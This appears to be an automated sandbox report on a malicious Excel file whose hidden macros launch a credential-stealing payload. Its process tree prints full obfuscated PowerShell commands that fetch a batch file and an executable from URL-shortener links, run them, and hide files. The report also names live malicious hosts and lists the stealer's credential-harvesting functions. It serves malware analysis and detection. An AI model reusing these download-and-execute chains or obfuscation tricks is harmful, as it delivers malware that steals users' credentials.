Loading ...

Play interactive tourEdit tour

Analysis Report ul9kpUwYel.xls

Overview

General Information

Sample Name:ul9kpUwYel.xls
Analysis ID:337274
MD5:c2ca4d5f2632597023b6cf5b496fb4ed
SHA1:076f6120eb80059c41e8d731d59471a2e9d81ad8
SHA256:1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
Tags:SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell downloading file from url shortener site
Contains functionality to steal Internet Explorer form passwords
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Obfuscated Powershell
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2484 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2604 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2300 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2524 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 284 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2492 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2936 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • attrib.exe (PID: 152 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)
    • cmd.exe (PID: 2320 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2460 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • cmd.exe (PID: 1924 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • mode.com (PID: 2420 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)
          • cmd.exe (PID: 952 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • cmd.exe (PID: 972 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • powershell.exe (PID: 2036 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
              • cr.exe (PID: 2240 cmdline: 'C:\Users\user\AppData\Roaming\cr.exe' MD5: 740E559929463320CB8E0403FD35A097)
    • cmd.exe (PID: 2848 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2860 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
ul9kpUwYel.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x44bc2:$s1: Excel
  • 0x4135e:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x12a6f:$r1: p^owersh^el^l
  • 0x12c98:$r1: p^owersh^el^l
  • 0x12f05:$r1: p^owersh^el^l
  • 0x130e2:$r1: p^owersh^el^l
  • 0x12a6f:$r2: p^owersh^el^l
  • 0x12c98:$r2: p^owersh^el^l
  • 0x12f05:$r2: p^owersh^el^l
  • 0x130e2:$r2: p^owersh^el^l
dump.pcapJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Documents\pd.batSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0xd4:$r1: p^owersh^el^l
    • 0x2fd:$r1: p^owersh^el^l
    • 0x524:$r1: p^owersh^el^l
    • 0x701:$r1: p^owersh^el^l
    • 0xd4:$r2: p^owersh^el^l
    • 0x2fd:$r2: p^owersh^el^l
    • 0x524:$r2: p^owersh^el^l
    • 0x701:$r2: p^owersh^el^l
    C:\Users\user\Documents\pd.batJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
      • 0x1b0da:$r1: p^owersh^el^l
      • 0x1b303:$r1: p^owersh^el^l
      • 0x1b52a:$r1: p^owersh^el^l
      • 0x1b707:$r1: p^owersh^el^l
      • 0x1d78c:$r1: p^owersh^el^l
      • 0x1d9b5:$r1: p^owersh^el^l
      • 0x1dbdc:$r1: p^owersh^el^l
      • 0x1ddb9:$r1: p^owersh^el^l
      • 0x1e04c:$r1: p^owersh^el^l
      • 0x1e275:$r1: p^owersh^el^l
      • 0x1e49c:$r1: p^owersh^el^l
      • 0x1e679:$r1: p^owersh^el^l
      • 0x1b0da:$r2: p^owersh^el^l
      • 0x1b303:$r2: p^owersh^el^l
      • 0x1b52a:$r2: p^owersh^el^l
      • 0x1b707:$r2: p^owersh^el^l
      • 0x1d78c:$r2: p^owersh^el^l
      • 0x1d9b5:$r2: p^owersh^el^l
      • 0x1dbdc:$r2: p^owersh^el^l
      • 0x1ddb9:$r2: p^owersh^el^l
      • 0x1e04c:$r2: p^owersh^el^l

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Powershell downloading file from url shortener siteShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), CommandLine: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2848, ProcessCommandLine: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), ProcessId: 2860
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2484, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2604
      Sigma detected: Hiding Files with Attrib.exeShow sources
      Source: Process startedAuthor: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2936, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 152

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: http://chebo.discountmonumentcenter.com/vantuz_2021.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URLShow sources
      Source: trashbininspector.funVirustotal: Detection: 8%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\cr.exeReversingLabs: Detection: 72%
      Multi AV Scanner detection for submitted fileShow sources
      Source: ul9kpUwYel.xlsVirustotal: Detection: 41%Perma Link
      Source: ul9kpUwYel.xlsMetadefender: Detection: 22%Perma Link
      Source: ul9kpUwYel.xlsReversingLabs: Detection: 34%
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\cr.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040B831 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00409D52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041A507 __EH_prolog,_strlen,CryptStringToBinaryA,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040A753 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040908B __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004233DC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004235AF lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040964F __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004339BC lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0029362C CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028A757 __EH_prolog,_strlen,CryptStringToBinaryA,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002937FF CredEnumerateW,CryptUnprotectData,LocalFree,AuditFree,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027989F __EH_prolog,wsprintfA,CryptUnprotectData,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027A9A3 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027BA81 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002A3C0C lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlen,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00279FA2 __EH_prolog,wsprintfA,_wcsstr,CryptUnprotectData,LocalFree,
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045F42D FindFirstFileExW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CF67D FindFirstFileExW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA,
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
      Source: global trafficDNS query: name: cutt.ly
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Jan 2021 08:06:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 04 Jan 2021 21:24:49 GMTAccept-Ranges: bytesContent-Length: 565248Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 d5 65 2a f6 b4 0b 79 f6 b4 0b 79 f6 b4 0b 79 e8 e6 8f 79 ed b4 0b 79 e8 e6 9e 79 ee b4 0b 79 e8 e6 88 79 97 b4 0b 79 d1 72 70 79 fd b4 0b 79 f6 b4 0a 79 93 b4 0b 79 e8 e6 81 79 f7 b4 0b 79 e8 e6 9f 79 f7 b4 0b 79 e8 e6 9a 79 f7 b4 0b 79 52 69 63 68 f6 b4 0b 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 b8 18 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 08 00 00 80 00 00 00 c0 37 04 b0 36 3f 04 00 d0 37 04 00 00 40 04 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 40 04 00 10 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 71 40 04 60 01 00 00 00 00 40 04 04 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 38 3f 04 18 00 00 00 88 f6 3f 04 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 c0 37 04 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 08 00 00 d0 37 04 00 28 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 80 00 00 00 00 40 04 00 74 00 00 00 2c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 195.201.225.248 195.201.225.248
      Source: Joe Sandbox ViewIP Address: 37.46.150.139 37.46.150.139
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: global trafficHTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: cutt.ly
      Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004254E5 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,
      Source: C:\Users\user\AppData\Roaming\cr.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: dump.pcap, type: PCAPMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
